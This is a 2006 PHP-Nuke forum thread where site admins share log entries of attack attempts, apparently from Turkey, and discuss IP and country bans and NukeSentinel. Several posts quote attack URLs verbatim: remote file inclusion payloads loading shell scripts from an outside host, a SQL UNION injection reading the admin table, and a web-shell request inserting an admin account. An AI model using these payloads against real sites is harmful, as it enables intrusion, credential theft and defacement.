Repeated Hack attempts from Turkey

Hangin' Around Joined: Mar 27, 2005 Posts: 39

Someone in Turkey is attempting to hack my site, luckily I am patched up, have extra site protection and whomever the hacker is, is using hacks for post nuke and xoops cms which I don't run!

Latest from my error logs:

Code:

[Tue Feb 14 05:01:14 2006] [error] [client 81.214.167.116] File does not exist: /home/xxxxxxxxxx/public_html/modules/PNphpBB2/includes/functions_admin.php


[Tue Feb 14 13:39:19 2006] [error] [client 81.215.237.159] File does not exist: /home/xxxxxxxxxx/public_html/modules/4nAlbum/public/displayCategory.php





[Wed Feb 15 18:16:52 2006] [error] [client 85.98.60.174] File does not exist: /home/xxxxxxxxxx/public_html/modules/My_eGallery/public/displayCategory.php

Here is the links they were using:

Code:

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aviozone.com/tool25.dat?&list=1&cmd=id





/modules/My_eGallery/public/displayCategory.php?basepath=http://aviozone.com/tool25.dat?&list=1&cmd=id

I went to the [ Only registered users can see links on this board! Get registered or login! ] but all 'contact us' links brings me to fake email addy's.

But if you copy-paste this link into your browser, you can DL and open in notepad, the tool they're trying to use and it definately is a defacing tool:

Code:

http://aviozone.com/tool25.dat?&list=1&cmd=id

I've banned a few different IP addys so far and three different ranges but they keep coming back, here's what I have banned so far:

81.214.167.116
81.214.160.0 81.214.175.255
81.215.232.0 - 81.215.239.255
81.214.169.117
85.98.60.174
85.98.48.0 - 85.98.63.255

What should I do, I'm tempted to block the entire country next!

Posted: Wed Feb 15, 2006 10:02 pm

Ban the entire country!! Ban'em All!

I don't know what part of the world you are in or what your site is abou but I have most of the world banned from my site.

If nothing else...Ban it for the next week....they will move on to someone else!

Dawg

Posted: Wed Feb 15, 2006 10:07 pm

Dawg wrote:

Ban the entire country!! Ban'em All!

I don't know what part of the world you are in or what your site is abou but I have most of the world banned from my site.

If nothing else...Ban it for the next week....they will move on to someone else!

Dawg

LMAO, I LIKE IT!!!

They started this back in December, there would be an attempt every other week or so, but now it's every day...

I'm in the USA and have your everyday chat site for sports fans, so I'd have no problem banning the entire country, can that be done in Sentinel??? If not, where do I get the ranges?

Posted: Wed Feb 15, 2006 10:59 pm

Did you install the Ip to Country tables when you installed NS?

If not what version are you running?

Dawg

Posted: Wed Feb 15, 2006 11:25 pm

Dawg wrote:

Did you install the Ip to Country tables when you installed NS?

If not what version are you running?

Dawg

Actually I just updated the IP2Countries in NS and saw that the number of pages for Turkey has dropped from 11 to 6...

I guess I just go on down the line and click 'block' for each range on all pages then???

Posted: Wed Feb 15, 2006 11:34 pm

The problem with Turkey is that they are all on dynamic DSL lines now. You ban one IP, they just get another. And banning ranges only works sometimes... each ISP seems to report small ranges that aren't contiguous.

I keep getting referral spam from "bwdow.com" - it autobans the IP but they keep coming
I think I may just go and ban Turkey anyway

Posted: Wed Feb 15, 2006 11:53 pm

That's what I'm going to do, Iran too, they've gave me some problems before from some school and when I emailed the admin, he demanded to see all my log files in there entirity before he did anything, needless to say i didn't!

Posted: Thu Feb 16, 2006 5:49 am

It´s that same tool I´spoke from:
[ Only registered users can see links on this board! Get registered or login! ]

It´s present since middle of december and there are different versions available.

Posted: Thu Feb 16, 2006 6:12 am

Yep, it was the ,iddle-end of December that I first noticed this in my error logs...

The site that the tool is hosted on, is poweb I believe, I'll check for sure and then contact them too...

Took awhile, but Turkey has been banned from site now, I'll keep my eyes open for any more of these...

Thanks everyone for their help and hopefully this doesn't get worse for all!

Sells PC To Pay For Divorce Joined: Posts: 5661

well i have about 20 banned countries.
why?....because they enjoy hacking sites or atleast try to.
And if you have a site that makes money somehow those countries will never bring in a penny,so you wont miss a thing....

Posted: Thu Feb 16, 2006 8:37 am

Ya know if there was an easier way to just ban a whole country I'd prlly be up there too!

But this will make you all laugh, Union attack was just blocked by NS, here is the link they tried:

Code:

xtremezone.us/modules.php?name=Search&type=comments&query=not123exists&instory=/**UNION**/ SELECT/**0,0,pwd,0,aid**FROM**/nuke_authors

The funny part is, look at what link refered them to my site, it was a google search of: 'this site is protected by nukesentinel'

Code:

http://www.google.com/search?q=this+site+is+protected+by++nukesentinel&hl=en&lr=&start=10&sa=N

I hope they enjoyed those PC-Killer templates too! Groovy

Regular Joined: Feb 18, 2006 Posts: 99

Hey, Ive gotten hacked 2 times in the last 2 days... I looked through my access logs and found this link....

Code:

http://*******.com//modules/coppermine/themes/default/theme.php?THEME_DIR=http%3A%2F%2Faviozone.com%2Fshell.dat%3F&act=sql&sql_login=*dbnamewashere*&sql_passwd=*password*&sql_server=localhost&sql_port=3306&sql_db=*DBname*&sql_tbl_act=insert&sql_tbl=nuke_authors&sql_tbl_ls=0&sql_tbl_le=30&sql_tbl_insert_q=+%60aid%60+%3D+%27Viper%27+AND+%60name%60+%3D+%27God%27+AND+%60url%60+%3D+%27http%3A%2F%2Ft*mydomainname*%27+AND+%60email%

the things with * around it was my real info they got*

and here is the DIR site url its using

Code:

http://aviozone.com/shell.dat?&act=about

I removed coppermine and also found a file in the coppermine album folder that was called training.bmp but it was actually somehow a folder and not a image.. I opened it and it seemed like some scripts he prob uploaded through coppermine.

This ip was also from turkey and here it is for you to add to the ban list.

81.214.172.158

Posted: Sat Feb 18, 2006 2:37 pm

oh just found this.. here are the turkish hackers.. they keep score
[ Only registered users can see links on this board! Get registered or login! ]

Posted: Sat Feb 18, 2006 2:52 pm

nice find but also old news ,and i know about aviozone.
they are just victim in this...and i maild the host this morning...
if you wanna complain to send email to sa-abuse(at)powweb.com
Just ban turkey.
And rename your coppermine...

Posted: Sat Feb 18, 2006 3:06 pm

do you think by me removing coppermine I might have a chance to not get hacked tonight... He does it around 7pm est evernight for the last 2 days

Posted: Sat Feb 18, 2006 3:25 pm

well make sure you are secured,if so dont allow any privileges to upload,then in your coppermine config change your coppermine name to bloodyhell ,or marrs,or belinda carlisle...whatever...
these attacks are mostly by remote...
ever seen a coppermine named president ?

Posted: Sat Feb 18, 2006 4:28 pm

viper155, sorry about that happening, and that's around the same time it was tried by my site too...

I just banned all of Turkey...

My hosting Tech support suggested I use mod-rewrite for that tool name to redirect it, I'l like to do this, to the PC-Killers, but how would I go about that!?

Posted: Sat Feb 18, 2006 5:28 pm

How about what ?
The templates..?

Posted: Sat Feb 18, 2006 6:12 pm

hitwalker wrote:

How about what ?
The templates..?

A way to redirect any link with:

Code:

tool25.dat?&list=1&cmd=id

in it or maybe even just the 'tool.dat' part or whatever, but anytime there is a link with that in it, have that link redirected to one of the PC-Killer templates for NS.

Posted: Sat Feb 18, 2006 6:19 pm

that wont work that way and its not easy.
with sentinel you dont need that realy.
The code they use is basically hosted on another site.
They also dont work,cause ive seem them all by now.

but as a temporary solution you could add to your htaccess
Redirect /whateverabusesive [ Only registered users can see links on this board! Get registered or login! ]

the [ Only registered users can see links on this board! Get registered or login! ] is the address you gonna send to.
keep the space between whateverabusesive and [ Only registered users can see links on this board! Get registered or login! ]

Posted: Sun Feb 19, 2006 7:40 am

Anyone know why when I go to the download section and click NukeSentinel my browser gets a error and has to close..

I wanna install that for my site Sad

Im using IE

Posted: Sun Feb 19, 2006 8:16 am

i think raven is testing the downloads......lol
go to [ Only registered users can see links on this board! Get registered or login! ] and download it there ..

Posted: Sun Feb 19, 2006 8:18 am

Ok, My php-nuke has alot of edited files for modules such as nuke royal ect... Does anyone install this module for money? Smile

thanks

Posted: Sun Feb 19, 2006 8:20 am

on what patched nuke version are you?

Posted: Sun Feb 19, 2006 8:29 am

I cant say for sure that im even on a patched version... Im running phpnuke 7.6

I was away from the internet for a few months and now that ive come back I have kinda forget everything ive done to the files... My guess is that I will need the patches and NukeSentinel added...

I am willing to pay for this to secure my site